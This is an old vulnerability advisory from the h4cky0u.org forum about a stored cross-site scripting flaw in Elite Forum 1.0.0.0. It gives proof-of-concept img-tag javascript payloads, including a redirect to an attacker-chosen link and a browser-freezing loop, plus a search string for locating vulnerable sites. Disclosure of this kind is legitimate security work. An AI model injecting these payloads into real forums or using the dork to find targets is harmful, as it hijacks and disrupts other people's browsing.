------------------------------------------------------<br>
HYSA-2005-009 <a href="http://h4cky0u.org">h4cky0u.org</a> Advisory 009<br>
------------------------------------------------------<br>
Date - Tue Nov 1 2005<br>
<br>
<br>
TITLE:<br>
======<br>
<br>
Elite Forum <a href="http://1.0.0.0">1.0.0.0</a> XSS Vulnerability<br>
<br>
<br>
SEVERITY:<br>
=========<br>
<br>
Medium<br>
<br>
<br>
SOFTWARE:<br>
=========<br>
<br>
Elite Forum <a href="http://1.0.0.0">1.0.0.0</a><br>
<br>
<br>
INFO:<br>
=====<br>
<br>
Elite Forum is a fierce competitor entering the world of forum systems. Unlike many other choices, Elite Forum does not <br>
<br>
require the hassle of a MySQL database. Elite Forum is one of the best and is packed full of features, including the <br>
<br>
following: No MySQL database required, Very easy installation, Support for both user registration and guests, Private <br>
<br>
Messaging System, Forum can be locked so registration is required, User, forum and topic statistics, Fast and easy to use <br>
<br>
search system, Ability to view who is currently browsing the forum, Sticky Topics (Announcements), Full member list, <br>
<br>
Unlimited users, topics and posts, Member Profiles/Stats, Multiple page support (both topics and posts user definable), <br>
<br>
Selectable time offset, Ability to auto check for updates/patches, Clean and streamlined design, Smiley Support, BB Code and <br>
<br>
auto url support, Topic status icons, Member and Guest user levels, Members can edit or delete their posts, Secure accounts, <br>
<br>
Add or remove admins via administrator panel, Admins can edit/delete any post or topic.<br>
<br>
Support Website : <a href="http://www.all-interviews.com/firestorm/?act=eliteforum">www.all-interviews.com/firestorm/?act=eliteforum</a> (Down at the time of Bug Discovery)<br>
<br>
<br>
BUG DESCRIPTION:<br>
================<br>
<br>
The system is vulnerable to Cross Site Scripting attacks. This issue is due to a failure of the application to properly <br>
<br>
sanitize user-supplied input.<br>
<br>
<br>
POC:<br>
====<br>
<br>
First find a forum running the Elite Forum package. Then click on a topic and then Post Reply. In the message box add any of <br>
<br>
the following codes. Here are some examples:<br>
<br>
<img src="javascript:void(window.location=('imagelink'))"> - Replace the imagelink with the link to the image you want to <br>
<br>
redirect the users viewing the topic containing this code.<br>
<br>
<img src="javascript:a=100;while(a>=0){alert(a);a--}"><br>
<br>
<img src="javascript:a=1;while(a>0){alert("sup?")"><br>
<br>
<br>
VENDOR STATUS:<br>
==============<br>
<br>
The support site is down and no vendor contact could be found.<br>
<br>
<br>
FIX:<br>
====<br>
<br>
No fix available as of date.<br>
<br>
<br>
GOOGLEDORK:<br>
===========<br>
<br>
"Powered by Elite Forum"<br>
<br>
<br>
CREDITS:<br>
========<br>
<br>
This vulnerability was discovered and researched by Gladiator.KHF (handle/username - gladiator) of h4cky0u Security Forums.<br>
<br>
<br>
mail : gleden123 at Yahoo dot Com<br>
<br>
web : <a href="http://www.h4cky0u.org">http://www.h4cky0u.org</a><br>
<br>
<br>
ORIGINAL ADVISORY:<br>
==================<br>
<br>
<a href="http://www.h4cky0u.org/advisories/HYSA-2005-009-elite-forum.txt">http://www.h4cky0u.org/advisories/HYSA-2005-009-elite-forum.txt</a><br clear="all"><br>-- <br><a href="http://www.h4cky0u.org">http://www.h4cky0u.org
</a><br>(In)Security at its best...